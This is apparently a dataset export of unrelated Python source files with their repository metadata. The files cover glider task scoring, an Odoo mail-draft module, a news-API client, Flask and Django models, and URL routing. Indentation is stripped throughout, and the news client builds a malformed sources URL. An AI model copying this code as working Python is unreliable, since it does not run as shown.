def _determine_trip_distances(self, fixes, outlanding_fix):
distances = list()
for leg, (fix1, fix2) in enumerate(double_iterator(fixes)):
distance = self._calculate_distance_completed_leg(leg, fix1, fix2)
distances.append(distance)
if outlanding_fix is not None:
outlanding_leg = len(fixes) - 1
distance = self._calculate_distance_outlanding_leg(outlanding_leg, fixes[-1], outlanding_fix)
distances.append(distance)
return distances
def _get_sector_fixes(self, trace):
current_leg = -1 # not yet started
sector_fixes = list()
enl_first_fix = None
enl_registered = False
for fix_minus1, fix in double_iterator(trace):
# check ENL when aircraft logs ENL and no ENL outlanding has taken place
if not enl_registered and self.enl_value_exceeded(fix):
if enl_first_fix is None:
enl_first_fix = fix
enl_time = seconds_time_difference_fixes(enl_first_fix, fix)
if self.enl_time_exceeded(enl_time):
enl_registered = True
if current_leg > 0:
break
elif not enl_registered:
enl_first_fix = None
if current_leg == -1: # before start
if self.started(fix_minus1, fix):
self._add_aat_sector_fix(sector_fixes, 0, fix_minus1) # at task start point
current_leg = 0
enl_registered = False
enl_first_fix = None
elif current_leg == 0: # first leg, re-start still possible
if self.started(fix_minus1, fix): # restart
sector_fixes[0] = [fix_minus1] # at task start point
current_leg = 0
enl_registered = False
enl_first_fix = None
elif self.waypoints[1].inside_sector(fix_minus1): # first sector
if enl_registered:
break # break when ENL is used and not restarted
self._add_aat_sector_fix(sector_fixes, 1, fix_minus1)
current_leg += 1
elif 0 < current_leg < self.no_legs - 1: # at least second leg, no re-start possible
if self.waypoints[current_leg].inside_sector(fix_minus1): # previous waypoint
self._add_aat_sector_fix(sector_fixes, current_leg, fix_minus1)
elif self.waypoints[current_leg + 1].inside_sector(fix_minus1): # next waypoint
self._add_aat_sector_fix(sector_fixes, current_leg + 1, fix_minus1)
current_leg += 1
elif current_leg == self.no_legs - 1: # last leg
if self.waypoints[current_leg].inside_sector(fix_minus1):
self._add_aat_sector_fix(sector_fixes, current_leg, fix_minus1)
elif self.finished(fix_minus1, fix):
sector_fixes.append([fix]) # at task finish point
break
# add last fix to sector if not already present
last_fix = trace[-1]
last_waypoint = self.waypoints[current_leg]
if not last_waypoint.is_line and last_waypoint.inside_sector(last_fix) and last_fix is not sector_fixes[-1][-1]:
sector_fixes[-1].append(last_fix)
if enl_registered:
return sector_fixes, enl_first_fix
else:
return sector_fixes, None
def _reduce_fixes(self, fixes, max_fixes):
reduction_factor = len(fixes) // max_fixes + 1
return fixes[0::reduction_factor]
def _reduce_sector_fixes(self, sector_fixes, max_fixes_sector):
reduced_sector_fixes = list()
for sector, fixes in enumerate(sector_fixes):
reduced_fixes = self._reduce_fixes(fixes, max_fixes_sector)
reduced_sector_fixes.append(reduced_fixes)
return reduced_sector_fixes
def _get_outside_sector_fixes(self, trace, sector_fixes, enl_outlanding_fix):
last_sector_fix = sector_fixes[-1][-1]
last_sector_index = trace.index(last_sector_fix)
outside_sector_fixes = list()
if enl_outlanding_fix is not None:
enl_outlanding_index = trace.index(enl_outlanding_fix)
if enl_outlanding_index > last_sector_index:
outside_sector_fixes = trace[last_sector_index + 1: enl_outlanding_index + 1]
else:
outside_sector_fixes = trace[last_sector_index+1:]
return outside_sector_fixes
def _add_aat_sector_fix(self, sector_fixes, taskpoint_index, fix):
if len(sector_fixes) < (taskpoint_index + 1):
sector_fixes.append([fix])
else:
sector_fixes[taskpoint_index].append(fix)
def _compute_max_distance_fixes(self, outlanded, waypoint_fixes):
distances = self._calculate_distances_between_sector_fixes(outlanded, waypoint_fixes)
# determine index on last sector/outlanding-group with maximum distance
max_dist = 0
maximized_dist_index = None
for index, distance in enumerate(distances[-1]):
if distance[0] > max_dist:
max_dist = distance[0]
maximized_dist_index = index
last_fix = waypoint_fixes[-1][maximized_dist_index]
max_distance_fixes = [last_fix]
index = maximized_dist_index
legs = len(waypoint_fixes) - 1
for leg in list(reversed(range(legs))):
index = distances[leg + 1][index][1]
max_distance_fix = waypoint_fixes[leg][index]
max_distance_fixes.insert(0, max_distance_fix)
return max_distance_fixes
def _calculate_distances_between_sector_fixes(self, outlanded, waypoint_fixes):
distances = [[]] * len(waypoint_fixes)
distances[0] = [[0, 0]] * len(waypoint_fixes[0])
completed_legs = len(waypoint_fixes) - 1
if outlanded:
completed_legs -= 1
for leg in range(completed_legs): # successful legs
distances[leg + 1] = [[0, 0] for _ in range(len(waypoint_fixes[leg + 1]))]
for fix2_index, fix2 in enumerate(waypoint_fixes[leg + 1]):
for fix1_index, fix1 in enumerate(waypoint_fixes[leg]):
distance = self._calculate_distance_completed_leg(leg, fix1, fix2)
total_distance = distances[leg][fix1_index][0] + distance
if total_distance > distances[leg + 1][fix2_index][0]:
distances[leg + 1][fix2_index] = [total_distance, fix1_index]
if outlanded:
leg = completed_legs
distances[leg + 1] = [[0, 0] for _ in range(len(waypoint_fixes[leg + 1]))]
for fix2_index, fix2 in enumerate(waypoint_fixes[leg + 1]):
for fix1_index, fix1 in enumerate(waypoint_fixes[leg][0:fix2_index+1]):
distance = self._calculate_distance_outlanding_leg(leg, fix1, fix2)
total_distance = distances[leg][fix1_index][0] + distance
if total_distance > distances[leg + 1][fix2_index][0]:
distances[leg + 1][fix2_index] = [total_distance, fix1_index]
return distances
def _refine_max_distance_fixes(self, outlanded, max_distance_fixes, sector_fixes, outside_sector_fixes=None):
"""look around fixes whether more precise fixes can be found, increasing the distance"""
if outside_sector_fixes is None:
outside_sector_fixes = []
refinement_fixes = 10
waypoint_fixes = [[max_distance_fixes[0]]] # already include start fix
successfull_legs = len(max_distance_fixes) - 1
if outlanded:
successfull_legs -= 1
for leg in range(len(max_distance_fixes) - 1):
on_outlanding_leg = outlanded and leg > successfull_legs - 1
fix = max_distance_fixes[leg+1]
if on_outlanding_leg:
if outside_sector_fixes:
fixes = outside_sector_fixes
else:
fixes = sector_fixes[leg]
else:
fixes = sector_fixes[leg + 1]
refinement_end, refinement_start = self._get_refinement_bounds(fix, fixes, refinement_fixes)
waypoint_fixes.append(fixes[refinement_start:refinement_end])
return waypoint_fixes
def _get_refinement_bounds(self, fix, fixes, refinement_fixes):
"""
:param fix:
:param fixes:
:param refinement_fixes: this number of fixes before and after each fix
:return:
"""
max_distance_index = fixes.index(fix)
refinement_start = max(max_distance_index - refinement_fixes, 0)
refinement_end = min(len(fixes) + 1, max_distance_index + refinement_fixes + 1)
return refinement_end, refinement_start
def _calculate_distance_outlanding_leg(self, leg, start_tp_fix, outlanding_fix):
if leg == 0:
tp1 = self.waypoints[leg + 1]
bearing = calculate_bearing(start_tp_fix, outlanding_fix)
closest_area_fix = calculate_destination(start_tp_fix, tp1.r_max, bearing)
distance = calculate_distance(self.start.fix, closest_area_fix)
distance -= calculate_distance(outlanding_fix, closest_area_fix)
elif leg == self.no_legs - 1: # take finish-point of task
distance = calculate_distance(start_tp_fix, self.finish.fix)
distance -= calculate_distance(self.finish.fix, outlanding_fix)
else:
tp1 = self.waypoints[leg + 1]
bearing = calculate_bearing(tp1.fix, outlanding_fix)
closest_area_fix = calculate_destination(tp1.fix, tp1.r_max, bearing)
if leg == 0:
distance = calculate_distance(self.start.fix, closest_area_fix)
else:
distance = calculate_distance(start_tp_fix, closest_area_fix)
distance -= calculate_distance(outlanding_fix, closest_area_fix)
return distance
def _calculate_distance_completed_leg(self, leg, start_tp_fix, end_tp_fix):
if leg == 0: # take start-point of task
start = self.waypoints[0]
distance = calculate_distance(start.fix, end_tp_fix)
if start.distance_correction == 'shorten_legs':
distance -= start.r_max
elif leg == self.no_legs - 1: # take finish-point of task
finish = self.waypoints[-1]
distance = calculate_distance(start_tp_fix, finish.fix)
if finish.distance_correction == 'shorten_legs':
distance -= finish.r_max
else:
distance = calculate_distance(start_tp_fix, end_tp_fix)
return distance
def _get_waypoint_fixes(self, outlanded, sector_fixes, outside_sector_fixes=None):
"""
Waypoint fixes are fixes which can be used for the distance optimisation. They are grouped per waypoint. In
case of an outlanding, the last sector waypoints are duplicated at the enable optimisation inside the sector.
Optional fixes outside the sector on the outlanding leg are also added in the last list.
:param outlanded:
:param sector_fixes:
:param outside_sector_fixes:
:return:
"""
if outside_sector_fixes is None:
outside_sector_fixes = list()
waypoint_fixes = deepcopy(sector_fixes)
if outlanded:
waypoint_fixes.append(sector_fixes[-1])
waypoint_fixes[-1].extend(outside_sector_fixes)
return waypoint_fixes
| [
"GliderGeek@users.noreply.github.com"
] | GliderGeek@users.noreply.github.com |
dfeae749b48534bb374a945d0bfda2df5bebe3d4 | 9ddfd30620c39fb73ac57e79eae0a001c45db45f | /addons/prt_mail_messages_draft/models/prt_mail_draft.py | 4e5815554dc290a8168928d341b09e81ec8f574e | [] | no_license | zamzamintl/silver | a89bacc1ba6a7a59de1a92e3f7c149df0468e185 | 8628e4419c4ee77928c04c1591311707acd2465e | refs/heads/master | 2023-01-06T20:29:25.372314 | 2020-10-29T21:02:41 | 2020-10-29T21:02:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,658 | py | from odoo import models, fields, api, _, tools
# import logging
# _logger = logging.getLogger(__name__)
# -- Select draft
def _select_draft(draft):
if draft:
return {
'name': _("New message"),
"views": [[False, "form"]],
'res_model': 'mail.compose.message',
'type': 'ir.actions.act_window',
'target': 'new',
'context': {
'default_res_id': draft.res_id,
'default_model': draft.model,
'default_parent_id': draft.parent_id,
'default_partner_ids': draft.partner_ids.ids or False,
'default_attachment_ids': draft.attachment_ids.ids or False,
'default_is_log': False,
'default_subject': draft.subject,
'default_body': draft.body,
'default_subtype_id': draft.subtype_id.id,
'default_message_type': 'comment',
'default_current_draft_id': draft.id,
'default_signature_location': draft.signature_location,
'default_wizard_mode': draft.wizard_mode
}
}
######################
# Mail.Message.Draft #
######################
class PRTMailMessageDraft(models.Model):
_name = "prt.mail.message.draft"
_description = "Draft Message"
_order = 'write_date desc, id desc'
_rec_name = 'subject'
# -- Set domain for subtype_id
def _get_subtypes(self):
return [('id', 'in', [self.env['ir.model.data'].xmlid_to_res_id('mail.mt_comment'),
self.env['ir.model.data'].xmlid_to_res_id('mail.mt_note')])]
subject = fields.Char(string="Subject")
subject_display = fields.Char(string="Subject", compute="_subject_display")
body = fields.Html(string="Contents", default="", sanitize_style=True, strip_classes=True)
model = fields.Char(sting="Related Document Model", index=True)
res_id = fields.Integer(string="Related Document ID", index=True)
subtype_id = fields.Many2one(string="Message Type", comodel_name='mail.message.subtype',
domain=_get_subtypes,
default=lambda self: self.env['ir.model.data'].xmlid_to_res_id('mail.mt_comment'),
required=True)
parent_id = fields.Integer(string="Parent Message")
author_id = fields.Many2one(string="Author", comodel_name='res.partner', index=True,
ondelete='set null',
default=lambda self: self.env.user.partner_id.id)
partner_ids = fields.Many2many(string="Recipients", comodel_name='res.partner')
record_ref = fields.Reference(string="Message Record", selection='_referenceable_models',
compute='_record_ref')
attachment_ids = fields.Many2many(string="Attachments", comodel_name='ir.attachment',
relation='prt_message_draft_attachment_rel',
column1='message_id',
column2='attachment_id')
ref_partner_ids = fields.Many2many(string="Followers", comodel_name='res.partner',
compute='_message_followers')
ref_partner_count = fields.Integer(string="Followers", compute='_ref_partner_count')
wizard_mode = fields.Char(string="Wizard Mode", default='composition')
signature_location = fields.Selection([
('b', 'Before quote'),
('a', 'Message bottom'),
('n', 'No signature')
], string='Signature Location', default='b', required=True,
help='Whether to put signature before or after the quoted text.')
# -- Count ref Partners
def _ref_partner_count(self):
for rec in self:
rec.ref_partner_count = len(rec.ref_partner_ids)
# -- Get related record followers
@api.depends('record_ref')
def _message_followers(self):
for rec in self:
if rec.record_ref:
rec.ref_partner_ids = rec.record_ref.message_partner_ids
# -- Get Subject for tree view
@api.depends('subject')
def _subject_display(self):
# Get model names first. Use this method to get translated values
ir_models = self.env['ir.model'].search([('model', 'in', list(set(self.mapped('model'))))])
model_dict = {}
for model in ir_models:
# Check if model has "name" field
has_name = self.env['ir.model.fields'].sudo().search_count([('model_id', '=', model.id),
('name', '=', 'name')])
model_dict.update({model.model: [model.name, has_name]})
# Compose subject
for rec in self:
subject_display = '=== No Reference ==='
# Has reference
if rec.record_ref:
subject_display = model_dict.get(rec.model)[0]
# Has 'name' field
if model_dict.get(rec.model, False)[1]:
subject_display = "%s: %s" % (subject_display, rec.record_ref.name)
# Has subject
if rec.subject:
subject_display = "%s => %s" % (subject_display, rec.subject)
# Set subject
rec.subject_display = subject_display
# -- Ref models
@api.model
def _referenceable_models(self):
return [(x.model, x.name) for x in self.env['ir.model'].sudo().search([('model', '!=', 'mail.channel')])]
# -- Compose reference
@api.depends('res_id')
def _record_ref(self):
for rec in self:
if rec.res_id:
if rec.model:
res = self.env[rec.model].sudo().search([("id", "=", rec.res_id)])
if res:
rec.record_ref = res
# -- Send message
def send_it(self):
self.ensure_one()
# Compose message body
return _select_draft(self)
###############
# Mail.Thread #
###############
class PRTMailThread(models.AbstractModel):
_name = "mail.thread"
_inherit = "mail.thread"
# -- Unlink: delete all drafts
def unlink(self):
if not self._name == 'prt.mail.message.draft':
self.env['prt.mail.message.draft'].sudo().search([('model', '=', self._name),
('id', 'in', self.ids)]).sudo().unlink()
return super().unlink()
########################
# Mail.Compose Message #
########################
class PRTMailComposer(models.TransientModel):
_inherit = 'mail.compose.message'
_name = 'mail.compose.message'
current_draft_id = fields.Many2one(string="Draft", comodel_name='prt.mail.message.draft')
# -- Save draft wrapper
def _save_draft(self, draft):
self.ensure_one()
if draft:
# Update existing draft
res = draft.write({
'res_id': self.res_id,
'model': self.model,
'parent_id': self.parent_id.id,
'author_id': self.author_id.id,
'partner_ids': [(6, False, self.partner_ids.ids)],
'attachment_ids': [(6, False, self.attachment_ids.ids)],
'subject': self.subject,
'signature_location': self.signature_location,
'body': self.body,
'wizard_mode': self.wizard_mode,
'subtype_id': self.subtype_id.id,
})
else:
# Create new draft
res = self.env['prt.mail.message.draft'].create({
'res_id': self.res_id,
'model': self.model,
'parent_id': self.parent_id.id,
'author_id': self.author_id.id,
'partner_ids': [(4, x, False) for x in self.partner_ids.ids],
'attachment_ids': [(4, x, False) for x in self.attachment_ids.ids],
'subject': self.subject,
'signature_location': self.signature_location,
'wizard_mode': self.wizard_mode,
'body': self.body,
'subtype_id': self.subtype_id.id,
})
return res
# -- Save draft button
def save_draft(self):
# Save or create draft
res = self._save_draft(self.current_draft_id)
# If just save
if self._context.get('save_mode', False) == 'save':
# Reopen current draft
if self.current_draft_id:
return _select_draft(self.current_draft_id)
# .. or newly created
return _select_draft(res)
# If in 'compose mode'
if self.wizard_mode == 'compose':
return self.env['ir.actions.act_window'].for_xml_id('prt_mail_messages_draft',
'action_prt_mail_messages_draft')
return
# -- Override send
def send_mail(self, auto_commit=False):
# Send message
res = super().send_mail(auto_commit=auto_commit)
# Delete drafts modified by current user
self.env['prt.mail.message.draft'].sudo().search([('model', '=', self.model),
('res_id', '=', self.res_id),
('write_uid', '=', self.create_uid.id)]).sudo().unlink()
# If in 'compose mode'
if self._context.get('wizard_mode', False) == 'compose':
res = self.env['ir.actions.act_window'].for_xml_id('prt_mail_messages', 'action_prt_mail_messages')
return res
| [
"mohamed.abdelrahman@businessborderlines.com"
] | mohamed.abdelrahman@businessborderlines.com |
d9116447940183782d77eb606f0d77ce6d21e8e3 | 7dc7b55c9fa6d7f5c6fba416fdd67367e7648beb | /tools/answer_authenticator.py | 6384256e962ebfeb90ca809699c00d375cfaa1f7 | [] | no_license | kunihik0/eye-pass | 7c39a35a28bf060fa2c2c11ea5bf86a94afb9f0d | 33bf3cd03ef2143c440b4ca7a428ed5f03a3245f | refs/heads/master | 2023-03-08T06:24:13.332006 | 2021-02-21T08:52:33 | 2021-02-21T08:52:33 | 271,292,524 | 0 | 0 | null | 2021-02-21T08:52:34 | 2020-06-10T14:02:11 | Python | UTF-8 | Python | false | false | 715 | py | import math
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
sys.path.append("../")
sys.path.append("../tools/")
sys.path.append("../answer_data/")
import numpy as np
import pandas as pd
from tools.evaluator import Evaluator
class Answer_Authenticator(object):
def __init__(self):
pass
def authenticator(self, np1, np2, threshold):
dtw = Evaluator().calc_dtw
func_dist = Evaluator().l2norm
distance = dtw(np1, np2, func_dist)[-1][-1][0]
self.judgment(distance, threshold)
def judgment(self, distance, threshold):
if distance < threshold:
print("succes!")
else:
print("failure")
| [
"tokuko2yuu.nikkorishiyou@gmail.com"
] | tokuko2yuu.nikkorishiyou@gmail.com |
59885a78501ecb843e715b9bd5e038d150ba4db8 | cccc5d20b81ec58f2941765d3b88b3fbfe2cedc9 | /app/request.py | 8318de4e13f1493675425f0c72fdac1cca63e131 | [
"MIT"
] | permissive | adosamjeshi/News-highlight | 78d87a56cc7bb1902ccb5ace995be9d6d4327938 | c1e469c8a4b493e5fad07b264da100e537717018 | refs/heads/master | 2022-07-04T10:06:23.083289 | 2020-05-12T14:27:19 | 2020-05-12T14:27:19 | 263,355,411 | 0 | 0 | MIT | 2020-05-12T22:21:39 | 2020-05-12T14:08:43 | Python | UTF-8 | Python | false | false | 3,312 | py | import urllib.request
import json
from .models import News, Sources
# getting api key
api_key = None
# getting the news base url
base_url = None
def configure_request(app):
global api_key, base_url
api_key = app.config["NEWS_API_KEY"]
base_url = app.config["NEWS_API_BASE_URL"]
def get_news(category):
'''
Function that gets json response to our url request
'''
get_news_url = base_url.format(category, api_key)
with urllib.request.urlopen(get_news_url) as url:
get_news_data = url.read()
get_news_response = json.loads(get_news_data)
news_results = None
if get_news_response["articles"]:
news_results_list = get_news_response["articles"]
news_results = process_results(news_results_list)
return news_results
def search_news(topic):
'''
Function to search for news by topic
'''
search_news_url = "https://newsapi.org/v2/everything?q={}&apiKey={}".format(topic, api_key)
with urllib.request.urlopen(search_news_url) as url:
search_news_data = url.read()
search_news_response = json.loads(search_news_data)
search_news_results = None
if search_news_response["articles"]:
search_news_list = search_news_response["articles"]
search_news_results = process_results(search_news_list)
return search_news_results
def sources_news():
'''
Function to search news sources
'''
sources_url = "https:/newsapi.org/v2/sources?apiKey{}".format(api_key)
with urllib.request.urlopen(sources_url) as url:
search_sources_data = url.read()
search_sources_response = json.loads(search_sources_data)
search_sources_results = None
if search_sources_response["sources"]:
search_sources_list = search_sources_response["sources"]
search_sources_results = process_sources(search_sources_list)
return search_sources_results
def process_results(news_list):
'''
Function that processes the news result and transform them to a list of Objects
Args:
news_list: A list of dictionaries that contain movie details
Returns:
news_results: A list of news objects
'''
news_results = []
for news_item in news_list:
author = news_item.get("author")
title = news_item.get("title")
description = news_item.get("description")
url = news_item.get("url")
urlToImage = news_item.get("urlToImage")
content = news_item.get("content")
if urlToImage:
news_object = News(author, title, description, url, urlToImage, content)
news_results.append(news_object)
return news_results
def process_sources(sources_list):
'''
'''
sources_results = []
for sources_item in sources_list:
id = sources_item.get("id")
name = sources_item.get("name")
description = sources_item.get("description")
url = sources_item.get("url")
category = sources_item.get("category")
if url:
sources_object = Sources(id, name, description, url, category)
sources_results.append(sources_object)
return sources_results | [
"noreply@github.com"
] | noreply@github.com |
46faef68d9ce77da1132f09cf8c57f06fac2e31d | 0380b1062081604e2edf18efccc86bab14cb7705 | /test/models.py | 52ccd0ce12fb2033278ee4ea6bc202eff331dba1 | [] | no_license | Demch1k/microblog | acdb5f751bbf089122e1a124f9850e95e7fab9db | fd5beb95cc03ff2db44bd055e045d2ad5d01a454 | refs/heads/master | 2020-04-17T03:37:37.632063 | 2019-01-24T05:29:09 | 2019-01-24T05:29:09 | 165,824,527 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,509 | py | from datetime import datetime
from test import db
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from test import login
from hashlib import md5
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
posts = db.relationship('Post', backref='author', lazy='dynamic')
about_me = db.Column(db.String(140))
last_seen = db.Column(db.DateTime, default=datetime.utcnow)
def __repr__(self):
return '<User {}>'.format(self.username)
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def avatar(self, size):
digest = md5(self.email.lower().encode('utf-8')).hexdigest()
return 'https://www.gravatar.com/avatar/{}?d=identicon&s={}'.format(
digest, size)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.String(140))
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<Post {}>'.format(self.body)
@login.user_loader
def load_user(id):
return User.query.get(int(id)) | [
"demch1k.mid@gmail.com"
] | demch1k.mid@gmail.com |
4a8839c76e364ce097ae40ad6f248bb84cc4d8ef | 7bcb0b7f721c8fa31da7574f13ed0056127715b3 | /src/apps/base/models/dimensions/dimension_client.py | 666ebe39af5dc08ced900d20257b4276f2e8c9ce | [] | no_license | simonchapman1986/ripe | 09eb9452ea16730c105c452eefb6a6791c1b4a69 | c129da2249b5f75015f528e4056e9a2957b7d884 | refs/heads/master | 2022-07-22T05:15:38.485619 | 2016-01-15T12:53:43 | 2016-01-15T12:53:43 | 49,718,671 | 1 | 0 | null | 2022-07-07T22:50:50 | 2016-01-15T12:53:09 | Python | UTF-8 | Python | false | false | 1,358 | py | from django.db import models
from django_extensions.db.fields import UUIDField
from apps.base.models.dimensions.dimension import select_or_insert
from apps.flags.checks.client import client
class DimensionClient(models.Model):
"""
DimensionClient
Dim to filter down on clients within the reported data facts
Although this is merely a dim within the system, we have a flag set to this dim.
The reason for this is because we ingest clients. If we are receiving events for a client that does not yet
exist in the clients table, something is going awry, either the ingested data, or one of our events is failing
to ingest as it should.
The 'client' flag simply checks the client table upon insertion, if the client does exist, we are ok and no
flag is required. However if it does not yet exist, there may be an issue so a DoesNotExist flag is raised.
Regardless of the flag outcome we always store the client dim, we cannot ignore the data we receive.
"""
client_id = UUIDField(version=4, unique=True)
class Meta:
app_label = 'base'
db_table = 'dim_client'
@classmethod
def insert(cls, **kwargs):
cid = kwargs.get('client_id', False)
if cid != -1:
client(client_id=cid, event_name='insert')
return select_or_insert(cls, values={}, **kwargs)
| [
"simon-ch@moving-picture.com"
] | simon-ch@moving-picture.com |
497873aaf13583eda297f97fa3f2d5ce489102fd | 2d7a6c084e55e52ca11378211b2cdea06a7fefa8 | /ex021.py | 9d6f73e75441d8561470e1ff80efad0e8dde34f0 | [] | no_license | 21lucasmessias/CursoEmVideo-Python | 2e0203aae33c1360c833e7c8f9c0b4cf861098ae | c05145e60a06ab959dbd0490239b12523ecd1c2a | refs/heads/master | 2020-07-04T19:46:24.783471 | 2019-08-14T17:16:02 | 2019-08-14T17:16:02 | 202,394,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | from pygame import mixer
mixer.init()
mixer.music.load('ex021.mp3')
mixer.music.play()
input('Listening')
| [
"noreply@github.com"
] | noreply@github.com |
d8ea407d41b9cb81401a2718e854ebdd703c93a0 | d51bed0d1f7917e05dc62e867f64035bfe875c04 | /virt_env/bin/flask | 880af2eab7944e502bab708436a16787f5f08e68 | [] | no_license | JQuelen/cse312-project | 0aae924fc4eca0dc38e79da74b406fa9ff9592be | e5268352b5593438f54a816fcad1b51704c8cec6 | refs/heads/main | 2023-04-15T02:41:33.066088 | 2021-05-08T02:06:11 | 2021-05-08T02:06:11 | 341,030,003 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | #!/home/ren/school/312/cse312-project/virt_env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"cantopra@buffalo.edu"
] | cantopra@buffalo.edu | |
8a431fd0e791b2f697b2f302884856a63fedaacd | cb6e6e9c310f3bc8ea7fa0b07c955b0b99693f80 | /nadb/urls.py | a6c37398c650db7ab0fe01db2e94f067f3829ec5 | [] | no_license | MechanisM/django-nadb | b9404926540473900b354b2d27e1cda75cdfc3c6 | b97ada6fedff7c9ba7994d6742a17979a939da71 | refs/heads/master | 2020-12-25T04:46:35.152055 | 2012-03-27T01:39:39 | 2012-03-27T01:39:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,050 | py | """
URL patterns for django-nadb.
Simply use a line like this in your root URLConf to set up the default
URLs for django-nadb:
(r'^blog/', include('nadb.urls')),
Including these URLs (via the ``include()`` directive) will set up the
following patterns based on whatever URL prefix they are included
under:
* Posts list at ``/``.
* Post detail at ``/<year>/<month>/<day>/<slug>``.
* Archive for a day at ``/<year>/<month>/<day>``.
* Archive for a month at ``/<year>/<month>``.
* Archive for a year at ``/<year>``.
* Categories list at ``/categories``.
* Category detail at ``/categories/<slug>``.
"""
from django.conf.urls.defaults import patterns, include, url
urlpatterns = patterns('nadb.views',
url(r'^(?P<year>\d{4})/(?P<month>\w{3})/(?P<day>\d{1,2})/(?P<slug>[-\w]+)/$',
view='post_detail',
name='post_detail'
),
url(r'^(?P<year>\d{4})/(?P<month>\w{3})/(?P<day>\d{1,2})/$',
view='post_archive_day',
name='post_archive_day'
),
url(r'^(?P<year>\d{4})/(?P<month>\w{3})/$',
view='post_archive_month',
name='post_archive_month'
),
url(r'^(?P<year>\d{4})/$',
view='post_archive_year',
name='post_archive_year'
),
url(r'^categories/(?P<slug>[-\w]+)/$',
view='category_detail',
name='category_detail'
),
url(r'^categories/$',
view='category_list',
name='category_list'
),
url(r'^$',
view='post_list',
name='post_list'
),
)
| [
"earonne@gmail.com"
] | earonne@gmail.com |
7df42e2ac65b41410913aeea15f66a7ecc66569b | 772d1ab6a1814e4b6a408ee39865c664563541a6 | /lms_app/lms_dto/QuestionDto.py | 8b8efd36df53eb095889030e90c1f10efc0d854d | [] | no_license | omitogunjesufemi/lms | 7deed8bf54799034d6af2b379a0c56801f5645cc | 9c8bb88556a3f5598cf555623ef016a74ae3f5c7 | refs/heads/master | 2023-05-04T12:52:13.862572 | 2021-05-25T13:48:26 | 2021-05-25T13:48:26 | 330,643,258 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 842 | py | class SetQuestionDto:
question_title: str
question_content: str
choice1: str
choice2: str
choice3: str
choice4: str
answer: str
assigned_mark: int
assessment_id: int
id: int
class UpdateQuestionDto:
question_title: str
question_content: str
choice1: str
choice2: str
choice3: str
choice4: str
answer: str
assigned_mark: int
id: int
class ListQuestionDto:
question_title: str
assigned_mark: int
assessment_id: int
question_content: str
choice1: str
choice2: str
choice3: str
choice4: str
answer: str
id: int
class GetQuestionDto:
question_title: str
question_content: str
choice1: str
choice2: str
choice3: str
choice4: str
answer: str
assigned_mark: int
assessment_id: int
id: int | [
"omitogunopeyemi@gmail.com"
] | omitogunopeyemi@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.